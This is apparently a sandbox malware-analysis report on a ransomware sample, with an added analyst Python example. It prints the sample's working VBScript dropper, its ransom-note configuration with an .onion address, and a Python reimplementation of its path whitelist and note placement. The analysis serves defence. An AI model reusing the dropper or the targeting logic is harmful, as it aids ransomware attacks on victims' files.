Source: | Binary string: SecurityCenterBroker.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityCenterBroker.pdbb. source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthSSO.pdb.pdbc source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscsvc.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: wscui.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: | Binary string: SecurityHealthAgent.pdb source: qeSw.exe, 00000002.00000002.1483070995.0000000002BEE000.00000004.00000001.sdmp |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Unpacked PE file: 2.2.qeSw.exe.400000.0.unpack |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface:
WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Google.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = "http://google.com"
oUrlLink.Save(G)
if (FSO.FileExists(Path)) Then WScript.Echo "Error!"
else
xml = "Msxml2.DOMDocument"
ws = "WScript.Shell"
bin = "bin.base64"
bs = "base64"
db = "Adodb.Stream"
Set wshs = createobject(ws)
filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\qeSw.exe"
end if
Function a(n)
Dim i, j, abc
abc = array("!","@","%",".","?","<",">","$","#",",")
For i = 0 To 9
n = replace(n, abc(i), "")
Next
a = replace(n,"*","/")
End Function
Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(a(code))
Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
wshs.Exec(filepath)
'WshShell.Popup "This file might not be the right file type, or it might be corrupted!", 20, "Windows", 0 + 48
IWshShell3.ExpandEnvironmentStrings("%TEMP%");
IWshShell3.CreateShortcut("C:\Users\user\AppData\Local\Temp\Google.url");
IWshURLShortcut.TargetPath("http://google.com");
IWshURLShortcut.Save("Unsupported parameter type 00000000");
IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Google.url");
IWshShell3.ExpandEnvironmentStrings("%TEMP%");
IXMLDOMNode._00000029("base64");
IXMLDOMElement.dataType("bin.base64");
IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFEBQjwAAAAAAAAAAOAADwELAQIAADoBAABQAwAAAAAAgDo");
_Stream.Type("1");
_Stream.Open();
IXMLDOMElement.nodeTypedValue();
_Stream.Write("Unsupported parameter type 00002011");
_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\qeSw.exe");
IWshShell3.Exec("C:\Users\user\AppData\Local\Temp\qeSw.exe") |
Source: qeSw.exe.0.dr | Static PE information: real checksum: 0x4be47 should be: 0x52514 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D7E0 push ecx; mov dword ptr [esp], 00000000h | 2_2_0040D7E1 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_007A57B0 push edx; ret | 2_2_007A593E |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785D51 push es; iretd | 2_2_00785D5D |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078550A push ebp; ret | 2_2_00785538 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0078073D push 00000000h; ret | 2_2_00780748 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00785F0D push esp; ret | 2_2_00785F13 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\free window registry repair\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\adobe\Acrobat Reader DC\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Extras\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\GUI\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\microsoft office\Office16\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\AutoItX\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\ProgramData\regid.1991-06.com.microsoft\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\Examples\Helpfile\E3495D-Readme.txt | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\common files\DESIGNER\E3495D-Readme.txt | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep | graph_2-8408 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep | graph_2-7471 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep | graph_2-8231 |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe TID: 5724 | Thread sleep time: -300000s >= -30000s | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW, | 2_2_0040BFC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, | 2_2_0040D070 |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: *:\program file*\vmware |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: +~C-{"mpk:"/fqCb2TTvBeb3VoL4lXa1fgDDn+sEO4+mBhIj9vrLEk=","mode:0,"spsz:15360,"thr:1000,"namesz:8,"idsz:6,"lfile:"{id}-Readme.txt,"onion:"rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion,"lend:"SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sIA0KYW5kIHlvdXIgaGVhcnQgcmF0ZSBoYXMgaW5jcmVhc2VkIGR1ZSB0byB0aGUgYWJpbGl0eSB0byB0dXJuIGl0IG9mZiwNCnRoZW4gd2UgcmVjb21tZW5kIHRoYXQgeW91IG1vdmUgYXdheSBmcm9tIHRoZSBjb21wdXRlciBhbmQgYWNjZXB0IHRoYXQgeW91IGhhdmUgYmVlbiBjb21wcm9taXNlZC4NClJlYm9vdGluZy9zaHV0ZG93biB3aWxsIGNhdXNlIHlvdSB0byBsb3NlIGZpbGVzIHdpdGhvdXQgdGhlIHBvc3NpYmlsaXR5IG9mIHJlY292ZXJ5Lg0KDQotLQ0KT3VyICBlbmNyeXB0aW9uIGFsZ29yaXRobXMgYXJlIHZlcnkgc3Ryb25nIGFuZCB5b3VyIGZpbGVzIGFyZSB2ZXJ5IHdlbGwgcHJvdGVjdGVkLCANCnRoZSBvbmx5IHdheSB0byBnZXQgeW91ciBmaWxlcyBiYWNrIGlzIHRvIGNvb3BlcmF0ZSB3aXRoIHVzIGFuZCBnZXQgdGhlIGRlY3J5cHRlciBwcm9ncmFtLg0KDQpEbyBub3QgdHJ5IHRvIHJlY292ZXIgeW91ciBmaWxlcyB3aXRob3V0IGEgZGVjcnlwdGVyIHByb2dyYW0sIHlvdSBtYXkgZGFtYWdlIHRoZW0gYW5kIHRoZW4gdGhleSB3aWxsIGJlIGltcG9zc2libGUgdG8gcmVjb3Zlci4NCg0KRm9yIHVzIHRoaXMgaXMganVzdCBidXNpbmVzcyBhbmQgdG8gcHJvdmUgdG8geW91IG91ciBzZXJpb3VzbmVzcywgd2Ugd2lsbCBkZWNyeXB0IHlvdSBvbmUgZmlsZSBmb3IgZnJlZS4NCkp1c3Qgb3BlbiBvdXIgd2Vic2l0ZSwgdXBsb2FkIHRoZSBlbmNyeXB0ZWQgZmlsZSBhbmQgZ2V0IHRoZSBkZWNyeXB0ZWQgZmlsZSBmb3IgZnJlZS4NCg0KLS0NCg0KU3RlcHMgdG8gZ2V0IGFjY2VzcyBvbiBvdXIgd2Vic2l0ZToNCg0KMS5Eb3dubG9hZCBhbmQgaW5zdGFsbCB0b3ItYnJvd3NlcjogaHR0cHM6Ly90b3Jwcm9qZWN0Lm9yZy8NCg0KMi5PcGVuIG91ciB3ZWJzaXRlOiB7b25pb259DQoNCjMuUHV0IHlvdXIgcGVyc29uYWwgY29kZSBpbiB0aGUgaW5wdXQgZm9ybToNCg0Ke2NvZGV9,"white:{"path:["*system volume information,"*windows.old,"*:\users\*\*tempmp","*msocache,"*:\winnt","*$windows.~ws,"*perflogs,"*boot,"*:\windows","*:\program file*\vmwaree","\\*\users\*\*temptemp","\\*\winntnt","\\*\windowsws","*\program file*\vmwaree","*appdata*microsoft,"*appdata*packages,"*microsoft\provisioning","*dvd maker,"*Internet Explorer,"*Mozilla,"*Mozilla*,"*Old Firefox data,"*\program file*\windows media**","*\program file*\windows portable**","*windows defender,"*\program file*\windows ntt","*\program file*\windows photo**","*\program file*\windows side**","*\program file*\windowspowershelll","*\program file*\cuass**","*\program file*\microsoft g |
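The memory string above is the sample's embedded configuration: a note filename template (lfile), the victim id length (idsz:6, which matches the six-character E3495D in the E3495D-Readme.txt files dropped across the file system), the .onion contact address, a base64 note template (lend) with {id}, {onion} and {code} placeholders, and a "white" list of path globs that are spared. The Python below is an added analyst example, not the sample's code and not output of the report. It transcribes a subset of the configuration with the quoting the sandbox rendering dropped restored, keeps only the path patterns that appear intact in the dump, decodes the opening of the note template, and applies the patterns with fnmatch. How the real matcher evaluates the globs is not visible in the dump: treating each pattern as a case-insensitive full glob tested against a directory and each of its parents is an assumption made for the example.

```python
import base64
import fnmatch
import ntpath

# Subset of the configuration blob from the memory dump, transcribed with the
# quoting repaired (the sandbox rendering drops closing quotes). "lend" is only
# the first 60 base64 characters of the note template. Constructed for this
# example; it is not parsed from the sample.
CONFIG = {
    "idsz": 6,
    "namesz": 8,
    "lfile": "{id}-Readme.txt",
    "onion": "rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion",
    "lend": "SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0K",
    "white_path": [
        r"*system volume information", r"*windows.old", r"*msocache",
        r"*:\winnt", r"*$windows.~ws", r"*perflogs", r"*boot", r"*:\windows",
        r"*:\program file*\vmware", r"*appdata*microsoft", r"*appdata*packages",
        r"*microsoft\provisioning", r"*dvd maker", r"*Internet Explorer",
        r"*Mozilla", r"*Mozilla*", r"*Old Firefox data", r"*windows defender",
    ],
}


def note_filename(cfg: dict, victim_id: str) -> str:
    """Expand the lfile template; the id length is pinned by idsz."""
    if len(victim_id) != cfg["idsz"]:
        raise ValueError(f"victim id must be {cfg['idsz']} characters")
    return cfg["lfile"].replace("{id}", victim_id)


def render_note(cfg: dict, victim_id: str, personal_code: str) -> str:
    """Decode the base64 note template and fill its placeholders."""
    text = base64.b64decode(cfg["lend"]).decode("utf-8")
    return (text.replace("{id}", victim_id)
                .replace("{onion}", cfg["onion"])
                .replace("{code}", personal_code))


def _self_and_parents(path: str):
    """Yield a Windows directory path, then each ancestor up to the drive root."""
    p = ntpath.normpath(path)
    while True:
        yield p
        parent = ntpath.dirname(p)
        if not parent or parent == p:
            return
        p = parent


def is_excluded(path: str, patterns) -> bool:
    """True if the directory or any parent matches a whitelist glob.

    Assumption: patterns are case-insensitive globs matched against whole
    directory paths at every level; the sample's exact semantics are unknown.
    """
    lowered = [pat.lower() for pat in patterns]
    return any(fnmatch.fnmatchcase(p.lower(), pat)
               for p in _self_and_parents(path) for pat in lowered)


def plan(cfg: dict, directories, victim_id: str):
    """Split candidate directories into skipped ones and note drop paths."""
    skipped, targets = [], []
    for d in directories:
        (skipped if is_excluded(d, cfg["white_path"]) else targets).append(d)
    return skipped, [ntpath.join(d, note_filename(cfg, victim_id)) for d in targets]


if __name__ == "__main__":
    # Directories taken from the "File created" lines of the report plus two
    # that the whitelist should cover.
    dirs = [r"C:\ProgramData", r"C:\Program Files\7-Zip",
            r"C:\Windows\System32", r"C:\Program Files (x86)\VMware\VMware Tools"]
    skipped, targets = plan(CONFIG, dirs, "E3495D")
    print("skipped:", skipped)
    print("notes  :", targets)
    print(render_note(CONFIG, "E3495D", "0000"))
```

The drop locations in the report (C:\ProgramData, C:\Program Files\7-Zip, the Office and Acrobat directories) are all outside the transcribed patterns, and no note appears under C:\Windows, which is consistent with the "*:\windows" entry; that consistency is the only check the dump allows, since several patterns are garbled in the rendering and the matcher itself is not shown.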